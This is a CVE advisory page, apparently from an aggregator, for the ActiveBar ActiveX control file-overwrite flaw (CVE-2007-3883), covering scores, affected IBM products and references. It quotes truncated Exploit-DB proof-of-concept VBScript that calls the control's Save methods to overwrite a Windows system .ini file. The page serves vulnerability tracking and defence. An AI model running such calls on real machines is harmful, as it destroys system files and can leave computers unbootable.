CVE-2007-3883
published 2007-07-18CVE-2007-3883: The Data Dynamics ActiveBar ActiveX control (actbar3.ocx) 3.2 and earlier allows remote attackers to create or overwrite files via a full pathname in (1) the…
PriorityP431medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
8.20%
94.2th percentile
The Data Dynamics ActiveBar ActiveX control (actbar3.ocx) 3.2 and earlier allows remote attackers to create or overwrite files via a full pathname in (1) the second argument to the Save method, or the first argument to the (2) SaveLayoutChanges or (3) SaveMenuUsageData method.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| datadynamics | activebar | <= 3.1 | — |
| ibm | rational_system_architect | <= 11.4.0.2 | — |
| ibm | rational_system_architect | — | — |
| ibm | rational_system_architect | — | — |
| ibm | rational_system_architect | — | — |
| ibm | rational_system_architect | — | — |
| ibm | rational_system_architect | — | — |
| ibm | rational_system_architect | — | — |
| ibm | rational_system_architect | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3fqj-ghhc-c98j: The ActiveBar1 ActiveX control in the Data Dynamics ActiveBar ActiveX controls, as distributed in ActBar
ghsa_unreviewed·2022-05-17·CVSS 5.1
CVE-2011-1207 [MEDIUM] CWE-863 GHSA-3fqj-ghhc-c98j: The ActiveBar1 ActiveX control in the Data Dynamics ActiveBar ActiveX controls, as distributed in ActBar
The ActiveBar1 ActiveX control in the Data Dynamics ActiveBar ActiveX controls, as distributed in ActBar.ocx 1.0.6.5 in IBM Rational System Architect 11.4.0.2, 11.4.0.1, and earlier, does not properly restrict the SetLayoutData method, which allows remote attackers to execute arbitrary code via a crafted Data argument, a different vulnerability than CVE-2007-3883. NOTE: some of these details are obtained from third party information.
GHSA
GHSA-qxc6-6fhg-q3v6: The Data Dynamics ActiveBar ActiveX control (actbar3
ghsa_unreviewed·2022-05-01
CVE-2007-3883 [MEDIUM] GHSA-qxc6-6fhg-q3v6: The Data Dynamics ActiveBar ActiveX control (actbar3
The Data Dynamics ActiveBar ActiveX control (actbar3.ocx) 3.2 and earlier allows remote attackers to create or overwrite files via a full pathname in (1) the second argument to the Save method, or the first argument to the (2) SaveLayoutChanges or (3) SaveMenuUsageData method.
No detection rules found.
Exploit-DB
Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods
exploitdb·2008-04-07
CVE-2007-3883 Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods
Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods
---
Data Dynamics ActiveBar ActiveX Control (Actbar3.ocx 3.2) Multiple Inscure Methods
url: http://www.datadynamics.com
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Save
SaveLayoutChanges
SaveMenuUsageData
Sub tryMe
on error resume next
Dim MyMsg
if Pucca.value = "Save" then
test.Save "", "c:\windows\system_.ini", 1
MyMsg = MsgBox("Exploit completed!")
elseif Pucca.value = "SaveLayoutChanges" then
test.SaveLayoutChanges "c:\windows\system_.ini", 1
MyMsg = MsgBox("Exploit completed!")
elseif Pucca.value = "SaveMenuUsageData" then
test.SaveMenuUsageData "c:\wi
Exploit-DB
Data Dynamics ActiveBar - ActiveX 'actbar3.ocx 3.1' Insecure Methods
exploitdb·2007-07-17
CVE-2007-3883 Data Dynamics ActiveBar - ActiveX 'actbar3.ocx 3.1' Insecure Methods
Data Dynamics ActiveBar - ActiveX 'actbar3.ocx 3.1' Insecure Methods
---
Data Dynamics ActiveBar ActiveX Control (actbar3.ocx
url: http://www.datadynamics.com/default.aspx
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.
THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
all software that use this ocx are vulnerable to this exploits.
This control is marked as:
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
KillBitSet: False
Save
Save
No writeups or analysis indexed.
http://osvdb.org/37692http://secunia.com/advisories/26098http://www.securityfocus.com/bid/24959https://exchange.xforce.ibmcloud.com/vulnerabilities/35471https://www.exploit-db.com/exploits/4190https://www.exploit-db.com/exploits/5395http://osvdb.org/37692http://secunia.com/advisories/26098http://www.securityfocus.com/bid/24959https://exchange.xforce.ibmcloud.com/vulnerabilities/35471https://www.exploit-db.com/exploits/4190https://www.exploit-db.com/exploits/5395
2007-07-18
Published